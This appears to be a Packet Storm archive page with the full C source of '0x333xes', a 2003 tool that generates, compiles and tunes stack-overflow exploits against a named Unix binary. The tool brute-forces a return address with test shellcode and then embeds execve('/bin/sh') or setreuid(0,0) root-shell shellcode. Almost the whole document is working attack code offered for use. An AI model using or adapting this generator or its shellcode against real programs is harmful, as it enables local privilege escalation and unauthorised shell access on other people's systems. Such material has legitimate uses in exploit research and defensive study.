what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

0x333xes.c

0x333xes.c
Posted Apr 16, 2003
Authored by Cowboy, 0x333 | Site 0x333.org

Simple utility that generates source code for stack overflow exploits.

tags | tool, overflow, rootkit
systems | unix
SHA-256 | a5f2e142677644b4e70103de86c6fd4a09cd604b95e5c51b8473cc67eb7ed715

0x333xes.c

Change Mirror Download
/*  0x333xes => stack overflow exploit generator
*
* simple stack overflow exploit generator, that
* permits you to generate a -working- exploit
* source code.
*
* coded by c0wboy
*
* ~ www.0x333.org ~
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>


#define VERSION "0.3"

#define EXPLOIT "exploit.c"
#define TEST "xes" /* file created with test shellcode */

#define LIMIT 0xc0000000
#define XES_std 0xbffff000 /* address we start from to search for RET */
#define XES_env 0xbfffe0ff /* that is not really true ... but i found
* some environment variables located there ...
*/

#define MAX_LENGHT 10240 /* max buffer-lenght to exploit */
#define MAX_EVIL 1337 /* max ret-buffer lenght */
#define MAX 3 /* max shellcodes supported */

#define fatal(x...) { fprintf (stderr, ##x); exit(-333); }


typedef struct {
char * sh_name;
char * sh_type;
} sharkode;

sharkode shark[] = {

{
" \"touch xes\" shellcode [-test only-]",
"unsigned char test[] =\n\t"
"\"\\xeb\\x30\\x5e\\x89\\x76\\x16\\x31\\xc0\\x88\"\n\t"
"\"\\x46\\x08\\x88\\x46\\x0b\\x88\\x46\\x15\\x89\"\n\t"
"\"\\x46\\x22\\xb0\\x0b\\x8d\\x5e\\x09\\x89\\x5e\"\n\t"
"\"\\x1a\\x8d\\x5e\\x0c\\x89\\x5e\\x1e\\x89\\xf3\"\n\t"
"\"\\x8d\\x4e\\x16\\x8d\\x56\\x22\\xcd\\x80\\x31\"\n\t"
"\"\\xc0\\xb0\\x01\\xcd\\x80\\xe8\\xcb\\xff\\xff\"\n\t"
"\"\\xff\\x2f\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\"\n\t"
"\"\\x20\\x2d\\x63\\x20\\x74\\x6f\\x75\\x63\\x68\"\n\t"
"\"\\x20\\x78\\x65\\x73\";"
},

{
" execve(/bin/sh); [linux]",
"unsigned char sharkode[] =\n\t"
"\"\\x31\\xc0\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\"\n\t"
"\"\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x99\\x52\\x53\"\n\t"
"\"\\x89\\xe1\\xb0\\x0b\\xcd\\x80\";"
},

{
" setreuid(0,0) shellcode",
"unsigned char sharkode[] =\n\t"
"\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\xb0\\x46\\xcd\"\n\t"
"\"\\x80\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\"\n\t"
"\"\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x8d\\x54\"\n\t"
"\"\\x24\\x08\\x50\\x53\\x8d\\x0c\\x24\\xb0\\x0b\"\n\t"
"\"\\xcd\\x80\\x31\\xc0\\xb0\\x01\\xcd\\x80\";"
},

{ NULL, NULL },
};

int off = 0;

// prototypes
int main (int, char * []);
void usage (char *);
void shak_list (void);
unsigned long xes (int); /* find correct ret address */

void
usage (char * prg)
{
fprintf (stderr, "\n [~] 0x333xes => stack overflow exploit generator v%s [~]\n", VERSION);
fprintf (stderr, " [~] coded by c0wboy ~ www.0x333.org [~] \n\n");
fprintf (stderr, " Usage : %s [-b binary] [-e env ] [-w switch]", prg);
fprintf (stderr, " [-s type] [-x] [-l lenght] [-o lenght] [-a align] [-h]\n");
fprintf (stderr, "\n \t-b\tbugged binary\n");
fprintf (stderr, " \t-e\tset environment variable bugged\n");
fprintf (stderr, " \t-w\tset switch bugged\n");
fprintf (stderr, " \t-s\tshellcode type [0-%d]\n", MAX-1);
fprintf (stderr, " \t-x\tshellcode list\n");
fprintf (stderr, " \t-l\tbuffer lenght\n");
fprintf (stderr, " \t-o\tevil buffer (nop+shellcode) lenght (default 1337)\n");
fprintf (stderr, " \t-a\talign the buffer (try 1)\n");
fprintf (stderr, " \t-h\tdisplay this help\n\n");

exit (-333);
}

void
shak_list (void)
{
int list;
fprintf (stdout, "\n [~] Shellcode Types :\n");
fprintf (stdout, " --------------------- \n");

for (list = 0; shark[list].sh_name != NULL; ++list)
fprintf (stdout, " [%d] %s\n", list, shark[list].sh_name);
fprintf (stdout, "\n");

exit (-333);
}

unsigned long
xes (int hard)
{
char wuffer[33];
unsigned long xes;
FILE * cya, * fd;

if (off)
xes=XES_env;
else
xes=XES_std;

for (; xes < (LIMIT+333) ; xes+=300)
{
bzero (wuffer, 33);
sprintf (wuffer, "./exploit 0x%x", xes);

fprintf (stdout, " * testing 0x%x\n", xes);
if ((cya=popen (wuffer, "r")) == NULL)
fatal (" [-] Error in testing exploit ...\n\n");

if ((fd=fopen (TEST, "r")))
{
pclose (cya);
fclose (fd);
return xes;
}
pclose(cya);
}

if (!hard)
fprintf (stderr, "\n [-] ret address NOT found ..\n [-] we suppose :\n"
" [*] wrong buffer align\n [~] try to solve this problem ...\n\n");

return (0x333);
}


int
main (int argc, char * argv[])
{
int c, s=1, len=0, out=MAX_EVIL, step=0, align=0, hard=0;
char exe[100], *bin=NULL, *w=NULL, *env=NULL;
unsigned long ret_add;
FILE * fd;

while(( c = getopt (argc, argv, "xhb:e:w:s:l:o:a:")) != EOF)
{
switch(c)
{
case 'b' : bin = optarg; break;

case 'e' :
env = optarg;
off=1;
break;

case 'w' : w = optarg; break;

case 's' : /* shellcode types */
s = atoi (optarg);
if ((s<0) || (s>MAX-1))
usage (argv[0]);
break;

case 'x' : shak_list();

case 'l' :
len = atoi (optarg);
if (len>MAX_LENGHT)
fatal (" [-] explotable-buffer is too long\n");
break;

case 'o' :
out = atoi (optarg);
if (out>MAX_EVIL)
fatal (" [-] ret-buffer too long\n");
break;

case 'a' : align = atoi (optarg); break;
case 'h' : usage(argv[0]);
default : usage(argv[0]);
}
}

if ((!bin) || (!len) || ((env) && (w)))
usage(argv[0]);

fprintf (stdout, "\n [~] 0x333xes => stack overflow exploit generator [~]\n");
fprintf (stdout, " [~] coded by c0wboy ~ www.0x333.org [~] \n\n");
fprintf (stdout, " [*] creating source code ...\n");


do_sploit : /* when ret is found, we re-write the exploit */

system ("rm -rf xes");

if((fd = fopen (EXPLOIT, "w")) == NULL)
fatal (" [-] Error in creating %s\n", EXPLOIT);

fprintf (fd, "/* Generated with 0x333xes ~ coded by c0wboy\n *");
fprintf (fd, "\n * ~ www.0x333.org ~\n *\n */ ");

/* setting header */
fprintf (fd, "\n#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n");
fprintf (fd, "#include <string.h>\n\n#define BIN\t\"%s\"\n#define NOP\t0x90\n", bin);
fprintf (fd, "#define BUFFER\t%i\n", len);

if (!env)
fprintf (fd, "#define OUTSIDE\t%i\n", out);

if (hard)
align = 1;

if (!align)
fprintf (fd, "#define ALIGN\t0\n");
else
fprintf (fd, "#define ALIGN\t%d\n", align);

if (step)
fprintf (fd, "#define RET\t0x%x\n", ret_add);

/* setting shellcode */
if (step)
fprintf (fd, "\n\n%s\n", shark[s].sh_type);
else
fprintf (fd, "\n\n%s\n", shark[0].sh_type); /* test-shellcode */

/* setting main() */
if (step)
fprintf (fd, "int\nmain ()\n");
else
fprintf (fd, "int\nmain (int argc, char * argv[])\n");

if (env)
fprintf (fd, "{\n int x;\n char buf[BUFFER], *bufz;\n");
else
fprintf (fd, "{\n int x;\n char buf[BUFFER], out[OUTSIDE], *bufz;\n");

if (step)
fprintf (fd, " unsigned long ret_add = RET, *add_ptr ;\n\n");
else
fprintf (fd, " unsigned long ret_add, *add_ptr ;\n\n"
" if (argc != 2)\n exit (-333);\n\n"
" ret_add = strtoul (argv[1], &argv[1], 16);\n\n");

fprintf (fd, " bufz = buf + ALIGN;\n add_ptr = (long *)bufz;\n\n"
" for (x=0; x<BUFFER-1; x+=4)\n"
" *(add_ptr++)=ret_add;\n\n");

if (env)
{
if (step)
{
fprintf (fd, " /* nop + shellcode */\n memset ((char *)buf, NOP, 333 + "
"strlen (sharkode));\n memcpy ((char *)buf+333, sharkode, "
"strlen (sharkode));\n");
}
else
{
fprintf (fd, " /* nop + shellcode */\n memset ((char *)buf, NOP, 333 + "
"strlen (test));\n memcpy ((char *)buf+333, test, strlen "
"(test));\n\n");
}
}
else /* standard exploiting */
{
fprintf (fd, " /* nop + shellcode */\n memset ((char *)out, NOP, OUTSIDE);\n");

if (step)
fprintf (fd, " memcpy ((char *)out + 333, sharkode, strlen(sharkode));\n\n");
else
fprintf (fd, " memcpy ((char *)out + 333, test, strlen(test));\n\n");

fprintf (fd, " memcpy((char *)out, \"OUT=\", 4);\n putenv(out);\n\n");
}

/* environment bugged ? */
if (env)
{
if(step)
fprintf (fd, "\n");

fprintf (fd, " setenv (\"%s\", buf, 333);\n", env);
}

/* switch ? */
if (w)
fprintf (fd, " execl (BIN, BIN, \"%s\", buf, NULL);\n", w);
else
{
if (env)
fprintf (fd, " execl (BIN, BIN, NULL);\n");
else
fprintf (fd, " execl (BIN, BIN, buf, NULL);\n");
}

fprintf (fd, "\n return 0;\n}\n\n");
fclose (fd);

/* compile & test exploit */
if (!step)
{
sprintf (exe, "gcc %s -o exploit", EXPLOIT);
system (exe);

fprintf (stdout, " [*] exploit created\n");
fprintf (stdout, " [*] now find correct ret add\n\n");

if (( ret_add = xes (hard) ) == 0x333)
{
if (hard)
{
fprintf (stdout, "\n [-] exploit doesn't work ...\n"
" [*] maybe binary has not -stack- overflow problem [**]\n"
" [-] other problems can be detected by reading source code ...\n"
" [-] sorry\n\n");
exit (-333);
}
else
hard=1;

goto do_sploit;
}
else
{
step=1;
goto do_sploit;
}
}

system ("rm -rf exploit xes");
fprintf (stdout, "\n [*] your working exploit for %s is ready !\n\n", bin);
return 0;
}

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close